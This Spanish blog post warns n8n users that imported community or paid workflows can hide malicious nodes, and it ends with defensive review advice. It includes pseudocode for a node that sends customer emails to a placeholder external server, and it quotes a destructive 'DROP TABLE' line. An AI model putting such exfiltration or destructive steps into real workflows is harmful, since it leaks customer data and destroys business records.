Noticias

n8n: Automatiza tu negocio… ¿o regalas tus datos sin saberlo?


¿Has oído hablar de n8n? Es la nueva sensación en automatización: conecta tu CRM, tu base de datos, tu correo y mil cosas más con drag & drop. Su comunidad crece a pasos agigantados y hay miles de workflows compartidos para copiar y pegar.

Pero… ¿qué pasa si no revisas bien lo que estás importando?

1. El paraíso de la automatización… y sus agujeros

  • Instalas n8n en tu servidor o en la nube.
  • Buscas un workflow para enviar newsletters, procesar pagos o actualizar tu inventario.
  • Descargas el pseudocódigo o JSON que alguien ha colgado gratis o incluso de pago.
  • Importas ese flujo en un clic… y se activa.

Bajo el capó puede esconderse la trampa perfecta.

2. ¿Cómo es el ataque? Pseudocódigo de ejemplo

Este fragmento no es inventado. Es funcional, realista y técnicamente posible. En apenas unos pasos, estás regalando tu base de datos de clientes sin saberlo:

Nodo “Obtener Clientes” (tipo: base de datos)
└─ Consulta: SELECT email, name FROM customers WHERE vip = true

Nodo “Procesar Lista” (tipo: función personalizada)
└─ Lógica interna: filtrar, componer mensajes…

Nodo “Exfiltrar Datos” (tipo: petición HTTP)
└─ URL destino: https://[SERVIDOR-EXTERNO]/upload
└─ Cuerpo: { datos: [emails extraídos] }

Nodo “Enviar Newsletter” (tipo: SMTP)
└─ Configuración legítima: servidor, usuario, contraseña…

¿Ves el peligro? Ese Nodo Exfiltrar Datos atrapa todos los correos VIP y los manda a un tercero ANTES de que tú siquiera hayas enviado tu campaña.

Y lo peor: esto puede estar oculto en un workflow que has comprado, descargado de un foro, o incluso confiado ciegamente por recomendaciones.

3. Escenarios reportados en la comunidad

Estos casos no salieron en titulares de prensa, pero sí han sido compartidos en Reddit, foros y canales de Discord por profesionales que metieron la pata por confianza ciega.

  1. Tomar control total por SMTP malicioso
    Un e-commerce importó un workflow para sincronizar contactos entre plataformas. El atacante había incluido su propio nodo SMTP, que usó para enviar spam con su remitente. Resultado: cuentas bloqueadas y el dominio en listas negras por phishing.
  2. Borrado de la base de datos con DROP TABLE
    En un foro se compartió un optimizado que contenía un DROP TABLE orders; camuflado entre comentarios. Al moverlo a producción sin revisar, el equipo lo ejecutó por accidente. Perdieron todas las órdenes previas sin posibilidad de recuperación.
  3. Acceso total al panel por SSH inverso
    Una agencia instaló un flujo listo para usar que abría una conexión SSH inversa con un servidor externo. No lo vieron hasta que alguien tomó control del panel de n8n y alteró flujos. Tuvieron que restaurar todo.

4. ¿Por qué es tan fácil caer?

  • Sin firma ni verificación: los flujos de trabajo de n8n se importan como JSON plano.
  • Confianza ciega en la comunidad: “si lo subieron a GitHub, será seguro”.
  • Falta de tiempo o revisión técnica: “ya lo probaré rápido, seguro que funciona”.
  • Reputación vs. revisión: incluso los workflows de pago pueden tener trampa si no los analizas.

5. ¿Y si el workflow es de pago?

Muchos usuarios ya compran flujos en marketplaces, foros o a creadores independientes. Pero pagar no garantiza que esté libre de código malicioso:

  • Puede incluir nodos que envían datos sensibles a terceros.
  • Puede llevar credenciales ya activadas que tú no ves hasta que ejecutas.
  • Incluso puede venir con código ofuscado en nodos Function.

Siempre revisa manualmente cada nodo, incluso si confías en el vendedor.

6. Cómo defenderse

Medida preventivaDescripción breve
Revisar la definición JSONAntes de importar, abre el JSON y busca nodos function, executeCommand, httpRequest.
Usar entornos de stagingNunca pruebes workflows en producción sin pruebas previas.
Limitar permisos de credencialesNo uses tu cuenta principal para dar acceso a n8n.
Auditar logs y alertasInstala alertas si un flujo realiza conexiones externas.
Crear flujos propiosSi puedes, créalos desde cero. Y si partes de uno externo, revísalo línea a línea.

Conclusión

n8n es una maravilla si sabes lo que haces. Pero si copias y pegas sin mirar, estás dejando tu infraestructura al alcance de cualquiera. Da igual si es gratuito o lo has comprado a 49€

No te fíes ni del código que viene hecho para ayudarte.
Si no lo entiendes, no lo ejecutes. Si lo vas a ejecutar, revisa cada paso.


Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *